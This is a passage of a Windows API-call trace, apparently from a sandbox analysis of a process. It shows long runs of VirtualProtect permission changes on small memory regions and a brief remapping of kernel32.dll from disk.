flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.441] VirtualProtect (in: lpAddress=0x1e78173, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.441] VirtualProtect (in: lpAddress=0x1e7819d, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.441] VirtualProtect (in: lpAddress=0x1e7819d, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.441] VirtualProtect (in: lpAddress=0x1e781a9, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.441] VirtualProtect (in: lpAddress=0x1e781a9, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.442] VirtualProtect (in: lpAddress=0x1e7820a, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.442] VirtualProtect (in: lpAddress=0x1e7820a, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.442] VirtualProtect (in: lpAddress=0x1e78210, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.442] VirtualProtect (in: lpAddress=0x1e78210, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.442] VirtualProtect (in: lpAddress=0x1e78352, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.443] VirtualProtect (in: lpAddress=0x1e78352, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.443] VirtualProtect (in: lpAddress=0x1e78375, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.443] VirtualProtect (in: lpAddress=0x1e78375, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.443] VirtualProtect (in: lpAddress=0x1e7837c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.443] VirtualProtect (in: lpAddress=0x1e7837c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.443] VirtualProtect (in: lpAddress=0x1e783ab, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.444] VirtualProtect (in: lpAddress=0x1e783ab, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.444] VirtualProtect (in: lpAddress=0x1e783fc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.444] VirtualProtect (in: lpAddress=0x1e783fc, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.444] VirtualProtect (in: lpAddress=0x1e78400, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.444] VirtualProtect (in: lpAddress=0x1e78400, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.444] VirtualProtect (in: lpAddress=0x1e784ae, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.445] VirtualProtect (in: lpAddress=0x1e784ae, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.445] VirtualProtect (in: lpAddress=0x1e784c0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.445] VirtualProtect (in: lpAddress=0x1e784c0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.445] VirtualProtect (in: lpAddress=0x1e78634, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.445] VirtualProtect (in: lpAddress=0x1e78634, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.446] VirtualProtect (in: lpAddress=0x1e7869b, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.446] VirtualProtect (in: lpAddress=0x1e7869b, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.446] VirtualProtect (in: lpAddress=0x1e78711, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.446] VirtualProtect (in: lpAddress=0x1e78711, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.446] VirtualProtect (in: lpAddress=0x1e7877d, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.446] VirtualProtect (in: lpAddress=0x1e7877d, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.447] VirtualProtect (in: lpAddress=0x1e787e0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.447] VirtualProtect (in: lpAddress=0x1e787e0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.447] VirtualProtect (in: lpAddress=0x1e78833, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.447] VirtualProtect (in: lpAddress=0x1e78833, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.447] VirtualProtect (in: lpAddress=0x1e78841, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.448] VirtualProtect (in: lpAddress=0x1e78841, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.448] VirtualProtect (in: lpAddress=0x1e78862, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.448] VirtualProtect (in: lpAddress=0x1e78862, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.448] VirtualProtect (in: lpAddress=0x1e78870, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.448] VirtualProtect (in: lpAddress=0x1e78870, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.448] VirtualProtect (in: lpAddress=0x1e78887, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.449] VirtualProtect (in: lpAddress=0x1e78887, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.449] VirtualProtect (in: lpAddress=0x1e78891, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.449] VirtualProtect (in: lpAddress=0x1e78891, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.449] VirtualProtect (in: lpAddress=0x1e788b2, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.449] VirtualProtect (in: lpAddress=0x1e788b2, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.450] VirtualProtect (in: lpAddress=0x1e7899e, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.450] VirtualProtect (in: lpAddress=0x1e7899e, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.450] VirtualProtect (in: lpAddress=0x1e78aea, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.450] VirtualProtect (in: lpAddress=0x1e78aea, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.450] VirtualProtect (in: lpAddress=0x1e78bcf, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.450] VirtualProtect (in: lpAddress=0x1e78bcf, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.451] VirtualProtect (in: lpAddress=0x1e78e1a, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.451] VirtualProtect (in: lpAddress=0x1e78e1a, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.451] VirtualProtect (in: lpAddress=0x1e78ece, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.451] VirtualProtect (in: lpAddress=0x1e78ece, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.451] VirtualProtect (in: lpAddress=0x1e78f1a, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.452] VirtualProtect (in: lpAddress=0x1e78f1a, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.452] VirtualProtect (in: lpAddress=0x1e78f6d, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.452] VirtualProtect (in: lpAddress=0x1e78f6d, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.452] VirtualProtect (in: lpAddress=0x1e78fb6, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.452] VirtualProtect (in: lpAddress=0x1e78fb6, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.452] VirtualProtect (in: lpAddress=0x1e790d6, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.453] VirtualProtect (in: lpAddress=0x1e790d6, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.453] VirtualProtect (in: lpAddress=0x1e790e6, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.453] VirtualProtect (in: lpAddress=0x1e790e6, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.453] VirtualProtect (in: lpAddress=0x1e7910f, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.454] VirtualProtect (in: lpAddress=0x1e7910f, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.454] VirtualProtect (in: lpAddress=0x1e79148, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.454] VirtualProtect (in: lpAddress=0x1e79148, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.454] VirtualProtect (in: lpAddress=0x1e79208, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.454] VirtualProtect (in: lpAddress=0x1e79208, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.454] VirtualProtect (in: lpAddress=0x1e7922a, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.455] VirtualProtect (in: lpAddress=0x1e7922a, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.455] VirtualProtect (in: lpAddress=0x1e79233, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.455] VirtualProtect (in: lpAddress=0x1e79233, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.734] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x1e60000) returned 0x0 [0043.737] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x18fbc0 | out: DllHandle=0x18fbc0*=0x76c20000) returned 0x0 [0043.737] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77130000 [0043.737] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x18fbc0 | out: DllHandle=0x18fbc0*=0x76c20000) returned 0x0 [0043.737] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77130000 [0043.738] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x18fbc0 | out: DllHandle=0x18fbc0*=0x76c20000) returned 0x0 [0043.738] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77130000 [0043.739] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x18fc18 | out: DllHandle=0x18fc18*=0x76c20000) returned 0x0 [0043.739] CreateFileW (lpFileName="C:\\Windows\\syswow64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0043.739] NtCreateSection (in: SectionHandle=0x18fc58, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x0, SectionPageProtection=0x2, AllocationAttributes=0x1000000, FileHandle=0xb4 | out: SectionHandle=0x18fc58*=0xb8) returned 0x0 [0043.739] NtMapViewOfSection (in: SectionHandle=0xb8, ProcessHandle=0xffffffff, BaseAddress=0x18fd04*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18fc64*=0x110000, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x2 | out: BaseAddress=0x18fd04*=0x1e60000, SectionOffset=0x0, ViewSize=0x18fc64*=0x110000) returned 0x40000003 [0043.740] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x18fbc0 | out: DllHandle=0x18fbc0*=0x76c20000) returned 0x0 [0043.740] VirtualProtect (in: lpAddress=0x1e70e15, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.740] VirtualProtect (in: lpAddress=0x1e70e15, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.741] VirtualProtect (in: lpAddress=0x1e70e41, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.741] VirtualProtect (in: lpAddress=0x1e70e41, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.741] VirtualProtect (in: lpAddress=0x1e70e92, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.741] VirtualProtect (in: lpAddress=0x1e70e92, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.741] VirtualProtect (in: lpAddress=0x1e70f1b, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.742] VirtualProtect (in: lpAddress=0x1e70f1b, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.742] VirtualProtect (in: lpAddress=0x1e70fbd, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.742] VirtualProtect (in: lpAddress=0x1e70fbd, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.742] VirtualProtect (in: lpAddress=0x1e70fc7, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.742] VirtualProtect (in: lpAddress=0x1e70fc7, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.742] VirtualProtect (in: lpAddress=0x1e70fdc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.743] VirtualProtect (in: lpAddress=0x1e70fdc, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.743] VirtualProtect (in: lpAddress=0x1e70fe5, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.743] VirtualProtect (in: lpAddress=0x1e70fe5, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.743] VirtualProtect (in: lpAddress=0x1e70feb, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.743] VirtualProtect (in: lpAddress=0x1e70feb, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.743] VirtualProtect (in: lpAddress=0x1e71012, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.744] VirtualProtect (in: lpAddress=0x1e71012, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.744] VirtualProtect (in: lpAddress=0x1e71018, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.744] VirtualProtect (in: lpAddress=0x1e71018, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.744] VirtualProtect (in: lpAddress=0x1e710a9, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.744] VirtualProtect (in: lpAddress=0x1e710a9, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.745] VirtualProtect (in: lpAddress=0x1e710b4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.745] VirtualProtect (in: lpAddress=0x1e710b4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.745] VirtualProtect (in: lpAddress=0x1e710bf, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.746] VirtualProtect (in: lpAddress=0x1e710bf, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.747] VirtualProtect (in: lpAddress=0x1e710ca, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.747] VirtualProtect (in: lpAddress=0x1e710ca, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.747] VirtualProtect (in: lpAddress=0x1e710d5, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.748] VirtualProtect (in: lpAddress=0x1e710d5, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.748] VirtualProtect (in: lpAddress=0x1e710e0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.748] VirtualProtect (in: lpAddress=0x1e710e0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.748] VirtualProtect (in: lpAddress=0x1e710eb, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.748] VirtualProtect (in: lpAddress=0x1e710eb, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.748] VirtualProtect (in: lpAddress=0x1e710f6, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.749] VirtualProtect (in: lpAddress=0x1e710f6, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.749] VirtualProtect (in: lpAddress=0x1e71115, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.749] VirtualProtect (in: lpAddress=0x1e71115, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.749] VirtualProtect (in: lpAddress=0x1e7112d, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.749] VirtualProtect (in: lpAddress=0x1e7112d, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.750] VirtualProtect (in: lpAddress=0x1e711a0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.750] VirtualProtect (in: lpAddress=0x1e711a0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.750] VirtualProtect (in: lpAddress=0x1e711ab, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.750] VirtualProtect (in: lpAddress=0x1e711ab, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.750] VirtualProtect (in: lpAddress=0x1e711c9, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.750] VirtualProtect (in: lpAddress=0x1e711c9, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.751] VirtualProtect (in: lpAddress=0x1e711ef, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.751] VirtualProtect (in: lpAddress=0x1e711ef, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.751] VirtualProtect (in: lpAddress=0x1e71201, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.751] VirtualProtect (in: lpAddress=0x1e71201, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.751] VirtualProtect (in: lpAddress=0x1e7120c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.752] VirtualProtect (in: lpAddress=0x1e7120c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.752] VirtualProtect (in: lpAddress=0x1e71231, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.752] VirtualProtect (in: lpAddress=0x1e71231, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.752] VirtualProtect (in: lpAddress=0x1e7123c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.752] VirtualProtect (in: lpAddress=0x1e7123c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.752] VirtualProtect (in: lpAddress=0x1e71261, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.753] VirtualProtect (in: lpAddress=0x1e71261, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.753] VirtualProtect (in: lpAddress=0x1e7126c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.753] VirtualProtect (in: lpAddress=0x1e7126c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.753] VirtualProtect (in: lpAddress=0x1e71444, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: 